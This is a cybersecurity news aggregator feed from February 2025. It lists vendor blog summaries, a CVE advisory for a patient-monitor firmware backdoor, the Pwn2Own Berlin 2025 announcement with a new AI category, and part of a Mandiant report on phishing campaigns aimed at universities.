One of the biggest challenges organizations face today is detecting malicious activity in cloud environments. As highlighted in MixMode’s latest Threat Research Report, cybercriminals are increasingly leveraging trusted cloud providers like AWS, Microsoft Azure, and Google Cloud to disguise their attacks, a strategy known as infrastructure laundering.

https://mixmode.ai/blog/hiding-in-plain-sight-the-hidden-dangers-of-geolocation-in-cloud-security-2/
ZTNA vs. VPN
2025-02-26T16:19:06Z | 1740586746

Virtual private networks (VPNs) have been the go-to solution for remote access for business users to connect back to corporate networks. In the days before remote and hybrid work went mainstream, VPN access was provisioned sparingly due to cost and security concerns, and most employees used them only occasionally. However, all caution was thrown to the wind during the COVID-19 pandemic. As companies opened the floodgates to prioritize business operations, threats followed the VPN back into the enterprise, leading to a nearly 2,000% increase in attacks against the VPN.

https://www.zentera.net/blog/ztna-vs-vpn
Other Products Only Filter Traffic—ThreatSTOP Actually Protects Your Firewall and Router: Updated
2025-02-26T15:08:56Z | 1740582536

Attackers are increasingly targeting the very perimeter devices—firewalls, routers, IPS solutions—meant to stand guard at the network’s edge. Unfortunately, many vendors can only flag malicious flows, rather than proactively blocking them at their source. At ThreatSTOP, we believe that any solution worth its salt must do more than filter traffic; it has to actively protect your critical infrastructure.

https://www.threatstop.com/blog/other-products-only-filter-traffic-threatstop-actually-protects-your-firewall-and-router
Understanding Memory Safety Vulnerabilities: Top Memory Bugs and How to Address Them
2025-02-26T14:10:29Z | 1740579029

Memory safety vulnerabilities remain one of the most persistent and exploitable weaknesses across software. From enabling devastating cyberattacks to compromising critical systems, these vulnerabilities present a constant challenge for developers and security professionals alike. Both the National Security Agency (NSA) and the Cybersecurity and Infrastructure Security Agency (CISA) have emphasized the importance of addressing memory […] The post Understanding Memory Safety Vulnerabilities: Top Memory Bugs and How to Address Them appeared first on RunSafe Security.

https://runsafesecurity.com/blog/memory-safety-vulnerabilities/
PCI DSS v4.0.1: The Changes You Need to Know to Qualify for SAQ A
2025-02-26T14:00:00Z | 1740578400

What's changed in PCI DSS v4.0.1? Get a breakdown of what these new requirements mean and how Akamai?s solutions can help.

https://www.akamai.com/blog/security/2025/feb/pci-dss-v4-0-1-changes-qualify-saq-a
Solving the Data Challenge of Telecom AIOps
2025-02-26T14:00:00Z | 1740578400

Artificial intelligence (AI) is set to transform almost every industry on Earth. Its effect can be even more profound on a critical, diverse, and complex industry such as telecom. In fact, it can improve efficiency and performance as well as reduce cost in almost every aspect of the telecom business, from customer...

https://www.netscout.com/blog/solving-data-challenge-telecom-aiops
Cato CTRL Threat Research: Advanced Behavioral Analysis of IoT and OT Devices for IoC Collection
2025-02-26T13:30:00Z | 1740576600

Executive Summary   In today’s hyperconnected industrial landscape, IoT and OT devices have become integral to modern operations, yet their security posture often remains inadequately monitored.   Cato CTRL is revealing a new and innovative approach to IoT/OT threat detection by leveraging advanced behavioral analysis of IoT/OT devices to generate high-confidence Indicators of Compromise (IoCs). We’ve developed... The post Cato CTRL Threat Research: Advanced Behavioral Analysis of IoT and OT Devices for IoC Collection appeared first on Cato Networks.

https://www.catonetworks.com/blog/cato-ctrl-advanced-behavioral-analysis-iot-ot-devices-ioc-collection/
Zero Trust Network Access Without the Performance Penalty
2025-02-26T13:00:00Z | 1740574800

https://www.akamai.com/blog/security/2025/feb/zero-trust-network-access-without-performance-penalty
AI Risks in Mobile Apps: How to Protect Your Data and Stay Compliant
2025-02-26T12:00:00Z | 1740571200

App Store and Google Play visitors find it hard to escape Artificial Intelligence (AI). From photo enhancement apps to voice assistants to health diagnostics, AI commands an undeniable presence in mobile apps. In fact, 10 out of 12 top graphic design apps use AI — it’s everywhere. As AI permeates mobile apps, it introduces a […] The post AI Risks in Mobile Apps: How to Protect Your Data and Stay Compliant appeared first on NowSecure.

https://www.nowsecure.com/blog/2025/02/26/ai-risks-in-mobile-apps-how-to-protect-your-data-and-stay-compliant/
The Best Security Is When We All Agree To Keep Everything Secret (Except The Secrets) - NAKIVO Backup & Replication (CVE-2024-48248)
2025-02-26T11:00:15Z | 1740567615

As an industry, we believe that we’ve come to a common consensus after 25 years of circular debates - disclosure is terrible, information is actually dangerous, it’s best that it’s not shared, and the only way to really to ensure that no one ever

https://labs.watchtowr.com/the-best-security-is-when-we-all-agree-to-keep-everything-secret-except-the-secrets-nakivo-backup-replication-cve-2024-48248/
Building a Portable Kali Box with Raspberry Pi and Touchscreen
2025-02-26T10:23:20Z | 1740565400

In this guide, I will walk you through the process of setting up a Raspberry Pi with a 3.5-inch touchscreen running Kali Linux. This compact yet powerful setup is perfect for on-the-go penetration testing and cybersecurity research. I’ll cover everything from flashing the Kali Linux image onto a microSD card, logging in for the first […] The post Building a Portable Kali Box with Raspberry Pi and Touchscreen first appeared on Mobile Hacker.

https://www.mobile-hacker.com/2025/02/26/building-a-portable-kali-box-with-raspberry-pi-and-touchscreen/
This month in security with Tony Anscombe – February 2025 edition
2025-02-26T10:00:00Z | 1740564000

Ransomware payments trending down, the cyber-resilience gap facing SMBs, and APT groups embracing generative AI – it's a wrap on another month filled with impactful security news

https://www.welivesecurity.com/en/videos/month-security-tony-anscombe-february-2025-edition/
Taking the relaying capabilities of multicast poisoning to the next level: tricking Windows SMB clients into falling back to WebDav
2025-02-26T09:37:28Z | 1740562648

https://www.synacktiv.com/publications/taking-the-relaying-capabilities-of-multicast-poisoning-to-the-next-level-tricking.html
Ghost Ransomware: Striking Before You Even Know It’s There by Lucie Cardiet
2025-02-26T00:00:00Z | 1740528000

Ghost ransomware strikes fast, exploiting vulnerabilities and encrypting data within hours—learn how AI can stop it before it’s too late.

https://www.vectra.ai/blog/ghost-ransomware-striking-before-you-even-know-its-there
GreyNoise Detects Active Exploitation of CVEs Mentioned in Black Basta’s Leaked Chat Logs
2025-02-26T00:00:00Z | 1740528000

Ransomware group Black Basta’s chat logs were leaked, revealing 62 mentioned CVEs (Source: VulnCheck). GreyNoise identified 23 of these CVEs as actively exploited, with some targeted in the last 24 hours. Notably, CVE-2023-6875 is being exploited despite not appearing in CISA’s KEV catalog — reinforcing the need for real-time intelligence beyond static lists.

https://www.greynoise.io/blog/greynoise-detects-active-exploitation-cves-black-bastas-leaked-chat-logs
Filtering Mandates
2025-02-25T20:52:09Z | 1740516729

Many countries worldwide now mandate that categories, apps and services are filtered on the Service Providers network. Some examples are: Italy, South Korea and Australia have either banned DeepSeek or banned it for certain users such as Federal Employees Source: https://www.zdnet.com/article/these-nations-are-banning-deepseek-ai-heres-why/ Lots of countries, including the UK, have court orders blocking certain streaming sites. An […]

https://secure64.com/2025/02/25/filtering-mandates/
New Black Duck Report: 86% of Commercial Codebases Contain Vulnerable Open Source, Exposing Organizations to Security Risks
2025-02-25T14:00:00Z | 1740492000

81% of codebases audited contained high- or critical-risk vulnerabilities, highlighting that blind spots are prevalent when it comes to open source dependency management. BURLINGTON, Mass., Feb....

https://news.blackduck.com/2025-02-25-New-Black-Duck-Report-86-of-Commercial-Codebases-Contain-Vulnerable-Open-Source,-Exposing-Organizations-to-Security-Risks
Abusing VBS Enclaves to Create Evasive Malware
2025-02-25T14:00:00Z | 1740492000

https://www.akamai.com/blog/security-research/2025/feb/2025-february-abusing-vbs-enclaves-evasive-malware
What Happened Before the Breach?
2025-02-25T13:23:29Z | 1740489809

Your organization is in crisis mode. Systems are down, data is compromised, and customers are asking questions you’re unprepared to answer. The breach is confirmed, but how did it happen? To truly understand, we must retrace the steps, from the chaotic aftermath to the silent clues hidden in your network. As we walk...

https://www.netscout.com/blog/what-happened-breach
Cisco Meraki for Government Achieves FedRAMP® Moderate Authorization
2025-02-25T13:12:37Z | 1740489157

Cisco Meraki is excited to announce that we have achieved FedRAMP® Moderate and StateRAMP® Moderate Authorization. Built on our reliable and scalable Cisco Meraki cloud networking platform, trusted by 75% of the Fortune 500, our Cisco Meraki for Government solution addresses the unique security and cloud-first needs of government agencies. Sponsored by the Cybersecurity and Read more... The post Cisco Meraki for Government Achieves FedRAMP® Moderate Authorization appeared first on The Meraki Blog.

https://meraki.cisco.com/blog/2025/02/cisco-meraki-for-government-achieves-fedramp-moderate-authorization/
Cisco Expands Partnership with NVIDIA to Accelerate AI Adoption in the Enterprise
2025-02-25T13:00:00Z | 1740488400

Bringing together two of the most utilized networking portfolios, Cisco Silicon One and NVIDIA Spectrum-X, will offer enterprises unmatched flexibility and choice in AI data center investments.More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

https://newsroom.cisco.com/c/r/newsroom/en/us/a/y2025/m02/cisco-expands-partnership-with-nvidia-to-accelerate-ai-adoption-in-the-enterprise.html
Weekly review of the National Cyber Security Centre Finland (NCSC-FI) – 08/2025
2025-02-25T11:37:36Z | 1740483456

This week, we cover phishing for Steam credentials, CEO fraud and managing the risk of software dependencies. We end with news from the Disobey event.

https://www.kyberturvallisuuskeskus.fi/en/news/weekly-review-national-cyber-security-centre-finland-ncsc-fi-082025
Weekly review of the National Cyber Security Centre Finland (NCSC-FI) – 08/2025
2025-02-25T11:37:36Z | 1740483456

This week, we cover phishing for Steam credentials, CEO fraud and managing the risk of software dependencies. We end with news from the Disobey event.

https://www.kyberturvallisuuskeskus.fi/en/news/weekly-review-national-cyber-security-centre-finland-ncsc-fi-082025
Dragos’s 8th Annual OT Cybersecurity Year in Review Is Now Available
2025-02-25T11:01:00Z | 1740481260

We’re excited to announce the release of our 8th Annual OT Cybersecurity Year in Review report. This annual report reveals... The post Dragos’s 8th Annual OT Cybersecurity Year in Review Is Now Available first appeared on Dragos.

https://www.dragos.com/blog/dragos-8th-annual-ot-cybersecurity-year-in-review-is-now-available/
Ghostwriter | New Campaign Targets Ukrainian Government and Belarusian Opposition
2025-02-25T10:55:52Z | 1740480952

Latest Ghostwriter campaign brings Belarusian opposition into its sights for the first time as it continues weaponizing XLS docs to drop malware.

https://www.sentinelone.com/labs/ghostwriter-new-campaign-targets-ukrainian-government-and-belarusian-opposition/
CVE-2025-1204
2025-02-25T09:17:00Z | 1740475020

CWE-912 HIDDEN FUNCTIONALITY: The "update" binary in the firmware of the affected product sends attempts to mount to a hard-coded, routable IP address, bypassing existing device network settings to do so. The function triggers if the 'C' button is pressed at a specific time during the boot process. If an attacker is able to control or impersonate this IP address, they could upload and overwrite files on the device. Per FDA recommendation, CISA recommends users remove any Contec CMS8000 devices from their networks. If asset owners cannot remove the devices from their networks, users should block 202.114.4.0/24 from their networks, or block 202.114.4.119 and 202.114.4.120. Please note that this device may be re-labeled and sold by resellers. Read more here: Do the CONTEC CMS8000 Patient Monitors Contain a Chinese Backdoor? The Reality is More Complicated….

https://claroty.com/team82/disclosure-dashboard/cve-2025-1204
S-RM Cyber Security Report: Data shows threat actors doubled while ransomware payments decreased
2025-02-25T09:08:07Z | 1740474487

Incidence response data shows threat actors doubled while ransomware payments decreased Since 2023, the number of threat-actors doubled – marking the biggest increase yet Ransomware was the leading incident category for the 3rd year running The number of ransomware payments made halved since 2022 39% of exploited software vulnerabilities in public-facing systems led to extortion attacks in 2024.

https://www.s-rminform.com/news/cyber-incident-report-press-release-2025
UAC-0173 проти Нотаріату України (CERT-UA#13738)
2025-02-25T08:52:49Z | 1740473569

Починаючи з другої половини січня 2025 року Урядовою командою реагування на комп'ютерні надзвичайні події України CERT-UA фіксується поновлення активності організованого злочинного угрупування UAC-0173, так званих "чорних нотаріусів", які на замовлення та за грошову винагороду проводять кібератаки для отримання прихованого віддаленого доступу до комп'ютерів нотаріусів з метою подальшого внесення несанкціонованих змін в державні реєстри.

https://cert.gov.ua/article/6282536
PolarEdge: Unveiling an uncovered ORB network
2025-02-25T08:01:19Z | 1740470479

This blog post analyzes the PolarEdge backdoor and its associated botnet, offering insights into the adversary’s infrastructure. La publication suivante PolarEdge: Unveiling an uncovered ORB network est un article de Sekoia.io Blog.

https://blog.sekoia.io/polaredge-unveiling-an-uncovered-iot-botnet/
How Threat Modeling Could Have Prevented the $1.5B Bybit Hack
2025-02-25T05:00:00Z | 1740459600

In this blog, we’ll talk about one of our most popular, but rarely published report types and how adding threat modeling to your organization can save you from becoming the next billion-dollar headline.

https://blog.trailofbits.com/2025/02/25/how-threat-modeling-could-have-prevented-the-1.5b-bybit-hack/
APAC DNS Forum 2025
2025-02-25T00:30:00Z | 1740443400

In 2025 we expect another record-breaking year of CVE production. This year we expect 45505 +/- 4,363 CVEs to be published in the calendar year (CY). There’s a 5% chance the actual number exceeds the maximum (49868) and a 5% chance is less than the minimum (41142). Rather than give you a false sense of precision, it’s probably far easier to say we expect between 41-50k of vulnerabilities in calendar year CY 2025.

https://www.first.org/blog/20250604-APAC-DNS-Forum-2025
Vulnerability Forecast for 2025
2025-02-25T00:30:00Z | 1740443400

In 2025 we expect another record-breaking year of CVE production. This year we expect 45505 +/- 4,363 CVEs to be published in the calendar year (CY). There’s a 5% chance the actual number exceeds the maximum (49868) and a 5% chance is less than the minimum (41142). Rather than give you a false sense of precision, it’s probably far easier to say we expect between 41-50k of vulnerabilities in calendar year CY 2025.

https://www.first.org/blog/20250607-Vulnerability-Forecast-for-2025
APAC DNS Forum 2025
2025-02-25T00:30:00Z | 1740443400

In 2025 we expect another record-breaking year of CVE production. This year we expect 45505 +/- 4,363 CVEs to be published in the calendar year (CY). There’s a 5% chance the actual number exceeds the maximum (49868) and a 5% chance is less than the minimum (41142). Rather than give you a false sense of precision, it’s probably far easier to say we expect between 41-50k of vulnerabilities in calendar year CY 2025.

https://www.first.org/blog/20250604-APAC-DNS-Forum-2025
Vulnerability Forecast for 2025
2025-02-25T00:30:00Z | 1740443400

In 2025 we expect another record-breaking year of CVE production. This year we expect 45505 +/- 4,363 CVEs to be published in the calendar year (CY). There’s a 5% chance the actual number exceeds the maximum (49868) and a 5% chance is less than the minimum (41142). Rather than give you a false sense of precision, it’s probably far easier to say we expect between 41-50k of vulnerabilities in calendar year CY 2025.

https://www.first.org/blog/20250607-Vulnerability-Forecast-for-2025
2024 Malicious Infrastructure Report
2025-02-25T00:00:00Z | 1740441600

Explore key 2024 cybercrime trends, including the rise of malware-as-a-service (MaaS), mobile malware, and Chinese and Russian state-sponsored threats. Learn how Insikt Group's expanded tracking enhances threat detection and strengthens security defenses against evolving malicious infrastructure.

https://www.recordedfuture.com/research/2024-malicious-infrastructure-report
Die versteckten Risiken von KI-Chatbots: Wenn Bequemlichkeit ihren Preis hat - Skyhigh Security Intelligence Digest
2025-02-24T17:21:12Z | 1740417672

AI-powered chatbots have become essential in daily life, handling everything from customer service to personal tasks. Their convenience leads many... The post The Hidden Risks of AI Chatbots: When Convenience Comes at a Cost – Skyhigh Security Intelligence Digest appeared first on Skyhigh Security.

https://www.skyhighsecurity.com/intelligence-digest/the-hidden-risks-of-ai-chatbots.html
Why your IT team needs to upgrade its digital employee experience (DEX)
2025-02-24T16:47:42Z | 1740415662

Republished with permission from CIO.com Business and IT leaders agree that improving the “digital employee experience” (DEX) results in better productivity and workplace morale. But recent research by Ivanti reveals an important reason why many organizations fail to achieve those benefits: rank-and-file IT workers lack the funding and the operational know-how to get it done. They don’t prioritize DEX for others because the organization hasn’t prioritized improving DEX for the IT team. There are enormous benefits in improving digital employee experience, and DEX remains an area that executive leaders are optimistic about. But there is a disconnect when it comes to its practical application across IT teams. IT professionals remain extremely skeptical, in part because they are being left out of the benefits of DEX. This has led to problematic perceptions: almost two-thirds (60%) of IT professionals in the Ivanti survey believing “Digital employee experience is a buzzword with no practical application at my organization.” Clearly IT leaders need to do more for teams to realize the full benefits of DEX. DEX best practices, metrics and tools are missing Nearly seven in ten (69%) leadership-level employees call DEX an essential or high priority in Ivanti’s 2024 Digital Experience Report: A CIO Call to Action, up from 61% a year ago. Yet the same report confirmed that DEX best practices are still not widely implemented in and by the IT team. Barely half of the Ivanti respondents say IT automates cybersecurity configurations, monitors application performance or remotely checks for operating system updates. While less than half say they are monitoring device performance, or automating tasks. This indicates few IT teams are systematically investing in DEX tools and practices to monitor the spectrum of user interactions and respond automatically to emerging problems before they disrupt employee productivity and satisfaction. Without these practices and tools, IT workers themselves struggle to cope with their coworkers’ “tech friction.” IT workers are over-burdened with the volume of DEX issues and hamstrung by manual resolution processes. Most of all, IT workers are “flying blind” because they lack detailed data about the real DEX issues plaguing themselves and the organization at large. Lack of DEX data undermines improvement goals This lack of data creates a major blind spot, says Daren Goeson, SVP of Product Management at Ivanti. “Accurate DEX data illuminate what are the real technology challenges that the organization is facing,” he says. “And the data enable IT to get at the root cause of the DEX issues.” Most IT organizations lack metrics for DEX. These include digital experience scores (only 48% do this), device/user analytics (42%) and speed of ticket resolution (39%). Without metrics, IT workers can’t discover the scope, scale and severity of DEX issues. They can’t prioritize DEX problems or measure progress toward DEX goals. Ivanti’s research shows the extent and costs of these chronic, endemic DEX problems and the toll they take: Office workers have to cope with an average of four technology-related issues every day, such as poor application or device performance, slow networks, and many more. 60% of office workers report frustration with their tech tools. 55% of them say negative experiences with workplace technology impact their mood and morale. A higher percentage of executive leaders than other information workers report experiencing sub-optimal DEX. To improve digital employee experience, start with IT employees “IT leaders can use the IT organization as a test bed to prove the effectiveness of proactively managing DEX,” says Goeson. Managed, measured DEX will ease IT’s workload and make staff more productive. How IT leaders can improve DEX for IT professionals Ensure IT staff have the updated tools they need to work anywhere. Nearly one-quarter (23%) of IT workers say that their current toolset is not as effective in off-site work. Establish DEX metrics and equip IT with the DEX management processes and tools to monitor, collect, analyze and present this data. Deploy automation processes and accurate knowledge bases to speed up help desk response and resolution. Leverage AI and machine learning capabilities — through endpoint management and service desk automation platforms — to detect data “signals” such as performance trends and thresholds before they become full-blown problems. And to automate routine tasks, such as installing a new patch or remediating slowed app performance. Prioritize automating help desk responses to trouble ticket requests by using self-service portals, AI/machine learning capabilities for routing and analyzing online and telephone ticket requests. The bottom line IT leaders can demonstrate the impact of managed, measured DEX for the enterprise. But that means starting by optimizing DEX for the IT organization. For more information, see Ivanti’s 2024 Digital Employee Experience Report: A CIO Call to Action.

https://www.ivanti.com/blog/why-it-needs-to-upgrade-dex
How IT leaders can assess secure-by-design software claims
2025-02-24T16:47:03Z | 1740415623

Republished with permission from CIO.com It’s no secret cyber threats are increasing. The cost of reported cybercrime in the US jumped 22% over the course of 2023 to more than $12.5 billion, according to the FBI’s Internet Crime Complaint Center. One issue is weaknesses that have been preserved in software by traditional approaches to coding and security. To combat these risks, there is now a concerted effort to create software that is secure by design. For example, the US Cybersecurity and Infrastructure Security Agency (CISA) has outlined a set of actions vendors can take to prove they are adopting secure by design principles. But without enforceable standards and metrics, it’s difficult for IT and security leaders to assess whether and how vendors are carrying out this secure by design approach. Here are some steps you can take. Incorporate secure by design practices into security risk assessments Vendor risk assessment is a standard process by which enterprises identify and evaluate the potential hazards associated with a vendor's products and operations. IT and security leaders can use this process to focus on secure by design principles and practices, says Michael Riemer, Field Chief Information Security Officer for Ivanti. “For us, as a software vendor, it means taking full responsibility for our own products,” Riemer says. “You look at the solution’s entire architecture and consider security in all areas, such as architecture design, storage, connectivity, usage, and so on.” As part of the security risk assessment, enterprises should also consider requiring a SOC 2 Type 2 report. This type of assessment provides more assurance about how a vendor protects customer data and information. It entails a third-party cybersecurity audit that assesses how the vendor’s internal security controls and practices work over an extended period of time. Here are some key questions every vendor should be able to answer: How often do you do penetration testing? What types of penetration testing are done? Do you perform both static and dynamic code analysis? Evaluate coding practices Traditional coding practices are sequential: one team works on a module, then hands it off to the next team and so on. But this preserves weaknesses that are introduced to the code base, says Riemer. By restructuring teams into “pods” or groups, each with a dedicated security architect, weaknesses can be weeded out from the start. This was a major change for Ivanti, says Riemer. Suppliers should be able to demonstrate these organizational changes and new practices. Assess the secure by design transparency Vendors should be able to publicly disclose their secure by design goals, and show that they are or will be reporting metrics on a regular basis. Customers should also be able to track the vendor’s progress through its software modules. “We’ve created specific goals and established a baseline and metrics,” says Riemer. “We’re holding ourselves accountable for our secure by design progress. These metrics will show what software modules we’ve analyzed and how deep the analyses have gone in identifying and rectifying weak coding practices.” The bottom line Business and IT leaders can use the principles of secure by design to assess the progress made by their software suppliers in creating code that is inherently more secure. Secure by design enables these leaders to minimize business risks.

https://www.ivanti.com/blog/security-risk-assessments-for-secure-by-design-software
Announcing Pwn2Own Berlin and Introducing an AI Category
2025-02-24T16:45:33Z | 1740415533

If you just want to read the contest rules, click here.Willkommen, meine Damen und Herren, zu unserem ersten Wettbewerb in Berlin! That’s correct (if Google translate didn’t steer me wrong). While the Pwn2Own competition started in Vancouver in 2007, we always want to ensure we are reaching the right people with our choice of venue. Over the last few years, the OffensiveCon conference in Berlin has emerged as one of the best offensive-focused events of the year. And while CanSecWest has been a great host over the years, it became apparent that perhaps it was time to relocate our spring event to a new home. With that, we are happy to announce that the enterprise-focused Pwn2Own event will take place on May 15-17, 2025, at the OffensiveCon conference in Berlin, Germany. While this event is currently sold out, we do have tickets available for competitors, and we believe the conference will also open a few more tickets for the public, too. The conference sold out its first run of tickets in under six hours, so it should be a fantastic crowd of some of the best vulnerability researchers in the world.We couldn’t go to a new venue without introducing a new category, and what technology has generated the most questions regarding its security posture? Artificial Intelligence. That’s why we are introducing the AI category with six targets in different frameworks. We’re going well beyond just prompt injections – you’ll need to execute arbitrary code to win this category. Last year, we introduced the Cloud-Native/Container category, and we were thrilled to see a successful Docker container escape at the contest. We’ll see if the AI category can make a similar splash or if it goes uncontested. I would bet there will be some participation – if I were a betting man.The Cloud-Native/Container category returns as does the Tesla category. Tesla has been a great partner since 2019, and they continue to innovate and increase the security of their vehicles, and I’m sure they will take the learnings from the recent Pwn2Own Automotive forward to the Berlin event. For this event, we’re focused simply on impact and getting code execution in a target component on the vehicle. For some targets, that may mean you need to get code execution in multiple systems on the way. And no, the awards aren’t cumulative. For example, you may need to exploit the infotainment system on the way to the Autopilot, but you’ll only get the award for the Autopilot.Of course, Pwn2Own wouldn’t be the same without our classic categories, like web browsers, OSes, and Enterprise Servers. Last year, the Master of Pwn was awarded to Manfred Paul, who successfully exploited all four web browsers at the contest. Altogether, we’ll again be offering more than $1,000,000 USD in cash and prizes at this year’s event. We’re looking forward to a new venue and an exciting event with some cutting-edge exploitation on display. Here is a full list of the categories for this year’s event:             -- AI Category          -- Web Browser Category          -- Cloud-Native/Container Category          -- Virtualization Category          -- Enterprise Applications Category          -- Server Category          -- Local Escalation of Privilege Category          -- Automotive Category Of course, no Pwn2Own competition would be complete without us crowning a Master of Pwn (Meister von Pwn?). Since the order of the contest is decided by a random draw, contestants with an unlucky draw could still demonstrate fantastic research but receive less money since subsequent rounds go down in value. However, the points awarded for each unique, successful entry do not go down. Someone could have a bad draw and still accumulate the most points. The person or team with the most points at the end of the contest will be crowned Master of Pwn, receive 65,000 ZDI reward points (instant Platinum status), a killer trophy, and a pretty snazzy jacket to boot. Let's look at the details of the rules for this year's event. AI Category We’re excited to introduce this category as it goes beyond what other AI “hackathons” have done already. In the past, AI Hackathons have focused on using AI to develop vulnerabilities or other offensive frameworks. We're opening up the AI infrastructure that is used to run models for exploitation - vector databases, frameworks for running models, and development toolkits. An attempt in this category must be launched from the contestant’s laptop. For the NVIDIA Container Toolkit target, the attempt must be launched from within a crafted container image and execute arbitrary code on the host operating system. Back to top Web Browser Category While browsers are the “traditional” Pwn2Own target, we’re continuously tweaking the targets in this category to ensure they remain relevant. We re-introduced renderer-only exploits a couple of years ago, and their reward remains at $60,000. However, if you have that Windows kernel privilege escalation or sandbox escape, that will earn you up to $100,000 or $150,000 respectively. The Windows-based targets will be running in a VMware Workstation virtual machine. Consequently, all browsers (except Safari) are eligible for a VMware escape add-on. If a contestant can compromise the browser in such a way that also executes code on the host operating system by escaping the VMware Workstation virtual machine, they will earn themselves an additional $80,000 and 8 more Master of Pwn points. Full exploits are still required for Apple Safari and Mozilla Firefox. Here’s a detailed look at the targets and available payouts: Back to top Cloud-Native/Container Category We’re excited to have this category return for its sophomore season, and we’re hopeful even more contestants will target one of these container targets. For an attempt to be ruled a success against these three, the exploit must be launched from within the guest container/microVM and execute arbitrary code on the host operating system. The final target in this category is gRPC – a modern open-source high-performance Remote Procedure Call (RPC) framework that can run in any environment.  A success here must leverage a vulnerability in the gRPC code base to obtain arbitrary code execution. Here are the payouts for this category: Back to top Virtualization Category Some of the highlights for each contest can be found in the Virtualization Category, and we’re thrilled to see what this year’s event could bring with it. As usual, VMware is the main highlight of this category as we’ll have VMware ESXi alongside VMware Workstation as a target with awards of $150,000 and $80,000 respectively. Microsoft also returns as a target and leads the virtualization category with a $250,000 award for a successful Hyper-V Client guest-to-host escalation. Oracle VirtualBox rounds out this category with a prize of $40,000. There’s an add-on bonus in this category as well. If a contestant can escape the guest OS, then escalate privileges on the host OS through a Windows kernel vulnerability (excluding VMware ESXi), they can earn an additional $50,000 and 5 more Master of Pwn points. That could push the payout on a Hyper-V bug to $300,000. Here’s a detailed look at the targets and available payouts in the Virtualization category: Back to top Enterprise Applications Category Enterprise applications return as targets with Adobe Reader and various Office components on the target list once again. Attempts in this category must be launched from the target under test. For example, launching the target under test from the command line is not allowed. Prizes in this category run from $50,000 for a Reader exploit with a sandbox escape or a Reader exploit with a kernel privilege escalation and $100,000 for an Office 365 application. Word, Excel, and PowerPoint are all valid targets. Microsoft Office-based targets will have Protected View enabled where applicable. Adobe Reader will have Protected Mode enabled where applicable. Here’s a detailed view of the targets and payouts in the Enterprise Application category: Back to top Server Category The Server Category for 2025 focuses solely on the server components we’re most interested in. These servers are often targeted by everyone from ransomware crews to nation/state actors, so we know there are exploits out there for them. The only question is whether we’ll see any of the competitors bring one of those exploits to Pwn2Own. SharePoint has been exploited in the wild, and in one case, part of that exploit chain was demonstrated at Pwn2Own. Microsoft Exchange has been a popular target for some time, and it returns as a target this year as well, with a payout of $200,000. This category is rounded out by Microsoft Windows RDP/RDS, which also has a payout of $200,000. Here’s a detailed look at the targets and payouts in the Server category: Back to top Local Escalation of Privilege Category This category is a classic for Pwn2Own and focuses on attacks that originate from a standard user and result in executing code as a high-privileged user. A successful entry in this category must leverage a kernel vulnerability to escalate privileges. We’ve swapped Ubuntu Desktop for Red Hat Enterprise Linux for Workstations, while Apple macOS, and Microsoft Windows 11 return as targets in this category. Last year, an exploit demonstrated at Pwn2Own won the Pwnie Award for Best Privilege Escalation. It would be interesting if a Pwn2Own bug could go back-to-back. Here’s a detailed look at the targets and payouts in this category: Back to top Automotive Category Since adding the Automotive Category in 2019, we’ve seen some amazing and creative research displayed – so much so that we expanded to holding a Pwn2Own Automotive event. Still, we’re happy to have Tesla return as a target for this event. As previously mentioned, we’ve streamlined the rules for this category this year, but that doesn’t mean it’s any easier to win. We’ll have both the 2024 Tesla Model 3 and 2025 Tesla Model Y bench-top units available as targets. We conduct all tests on the bench-top units as attempting the exploits on an actual vehicle could prove hazardous to bystanders and other vehicles in the area. Here are this year’s awards for the Automotive Category: Back to top ConclusionThe complete rules for Pwn2Own 2025 are found here. As always, we encourage entrants to read the rules thoroughly if they choose to participate. If you are thinking about participating but have specific configuration or rule-related questions, email us. Questions asked over X (nee Twitter), BlueSky, Instagram, or other means will not be answered. Registration is required to ensure we have sufficient resources on hand at the event. Please contact ZDI at pwn2own@trendmicro.com to begin the registration process. Registration for onsite participation closes at 5 p.m. Central European Time on May 8, 2025.Be sure to stay tuned to this blog and follow us on Twitter, Mastodon, LinkedIn, or Bluesky for the latest information and updates about the contest. We look forward to seeing everyone in Germany, and we hope someone has a new car to drive home from this year’s Pwn2Own competition.With special thanks to our Pwn2Own 2025 partner Tesla ©2025 Trend Micro Incorporated. All rights reserved. PWN2OWN, ZERO DAY INITIATIVE, ZDI, TREND ZERO DAY INITIATIVE, and Trend Micro are trademarks or registered trademarks of Trend Micro Incorporated. All other trademarks and trade names are the property of their respective owners.

https://www.thezdi.com/blog/2025/2/24/announcing-pwn2own-berlin-2025
Phishing Campaigns Targeting Higher Education Institutions
2025-02-24T14:00:00Z | 1740405600

Written by: Ashley Pearson, Ryan Rath, Gabriel Simches, Brian Timberlake, Ryan Magaw, Jessica Wilbur Overview Beginning in August 2024, Mandiant observed a notable increase in phishing attacks targeting the education industry, specifically U.S.-based universities. A separate investigation conducted by the Google’s Workspace Trust and Safety team identified a long-term campaign spanning from at least October 2022, with a noticeable pattern of shared filenames, targeting thousands of educational institution users per month. These attacks exploit trust within academic institutions to deceive students, faculty, and staff, and have been timed to coincide with key dates in the academic calendar. The beginning of the school year, with its influx of new and returning students combined with a barrage of administrative tasks, as well as financial aid deadlines, can create opportunities for attackers to carry out phishing attacks. In these investigations, three distinct campaigns have emerged, attempting to take advantage of these factors.  In one campaign, attackers leveraged phishing campaigns utilizing compromised educational institutions to host Google Forms. At this time, Mandiant has observed at least 15 universities targeted in these phishing campaigns. In this case, the malicious forms were reported and subsequently removed. As such, at this time none of the phishing forms identified are currently active. Another campaign involved scraping university login pages and re-hosting them on the attacker-controlled infrastructure. Both campaigns exhibited tactics to obfuscate malicious activity while increasing their perceived legitimacy, ultimately to perform payment redirection attacks. These phishing methods employ various tactics to trick victims into revealing login credentials and financial information, including requests for school portal login verification, financial aid disbursement, refund verification, account deactivation, and urgent responses to campus medical inquiries. Google takes steps to protect users from misuse of its products, and create an overall positive experience. However, awareness and education play a big role in staying secure online. To better protect yourself and others, be sure to report abuse.   Case Study 1: Google Forms Phishing Campaign The first observed campaign involved a two-pronged phishing campaign. Attackers distributed phishing emails that contained a link to a malicious Google Form. These emails and their respective forms were designed to mimic legitimate university communications, but requested sensitive information, including login credentials and financial details. Figure 1: Example phishing email Figure 2: Another example phishing email The email is just the initial stage of the attack. While there are legitimate URLs contained within the phish, there is also a request to visit an external link to provide “urgent” information. This external link leads victims to a Google Form that has been tailored to the targeted university, including a color scheme in the school colors, a header with the logo or mascot, and references to the university name. Mandiant has observed the creation and staging of several different Google Forms, all with different methods employed to trick victims into providing sensitive information. In one instance, the social engineering pretext is that a student’s account is “associated with logins 